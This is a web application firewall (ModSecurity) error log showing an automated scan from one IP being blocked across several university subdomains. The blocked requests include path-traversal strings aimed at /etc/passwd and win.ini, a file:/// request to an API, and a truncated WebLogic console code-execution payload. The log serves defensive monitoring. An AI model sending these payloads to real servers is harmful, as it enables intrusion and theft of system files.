[Tue Aug 29 11:46:28.413231 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhBSIsAAAAX"]
[Tue Aug 29 11:46:28.430087 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhui4UAAAAr"]
[Tue Aug 29 11:46:28.431429 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhrqSMAAAAo"]
[Tue Aug 29 11:46:28.443481 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14JMCo-f0AAAhl0DgAAAAi"]
[Tue Aug 29 11:46:28.452414 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAib55kAAAAA"]
[Tue Aug 29 11:46:28.507082 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhui4YAAAAr"]
[Tue Aug 29 11:46:28.507387 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhBSIwAAAAX"]
[Tue Aug 29 11:46:28.507555 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhZRp4AAAAG"]
[Tue Aug 29 11:46:28.521752 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhl0DoAAAAi"]
[Tue Aug 29 11:46:28.527004 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhT34gAAAAD"]
[Tue Aug 29 11:46:28.548038 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAi0JN8AAAAK"]
[Tue Aug 29 11:46:28.549409 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhrqSYAAAAo"]
[Tue Aug 29 11:46:28.564330 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhZRp8AAAAG"]
[Tue Aug 29 11:46:28.564711 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAi5uGoAAAAS"]
[Tue Aug 29 11:46:29.718677 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAhzvjoAAAAx"]
[Tue Aug 29 11:46:29.768029 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOwAAAAK"]
[Tue Aug 29 11:46:29.771935 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAjCa8AAAAAB"]
[Tue Aug 29 11:46:29.808593 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JO4AAAAK"]
[Tue Aug 29 11:46:30.158863 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JsCo-f0AAAib558AAAAA"]
[Tue Aug 29 11:46:30.417297 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JsCo-f0AAAi2yFIAAAAN"]
[Tue Aug 29 11:46:30.528553 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAi5uGwAAAAS"]
[Tue Aug 29 11:46:30.546864 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAhtjk8AAAAq"]
[Tue Aug 29 11:46:30.569076 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi5uG4AAAAS"]
[Tue Aug 29 11:46:30.606442 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAhtjlIAAAAq"]
[Tue Aug 29 11:46:30.640014 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjCa8QAAAAB"]
[Tue Aug 29 11:46:30.691454 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAjFodoAAAAF"]
[Tue Aug 29 11:46:30.712384 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi5uHMAAAAS"]
[Tue Aug 29 11:46:30.715476 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14JsCo-f0AAAjFodsAAAAF"]
[Tue Aug 29 11:46:30.715720 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAi0JPQAAAAK"]
[Tue Aug 29 11:46:30.733604 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14JsCo-f0AAAi5uHQAAAAS"]
[Tue Aug 29 11:46:30.763362 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14JsCo-f0AAAi0JPYAAAAK"]
[Tue Aug 29 11:46:30.792651 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JsCo-f0AAAhtjloAAAAq"]
[Tue Aug 29 11:46:30.811076 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi0JPgAAAAK"]
[Tue Aug 29 11:46:30.832253 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAhtjlwAAAAq"]
[Tue Aug 29 11:46:31.363242 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjIhhgAAAAJ"]
[Tue Aug 29 11:46:31.401191 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjCa8wAAAAB"]
[Tue Aug 29 11:46:31.404561 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjFoeAAAAAF"]
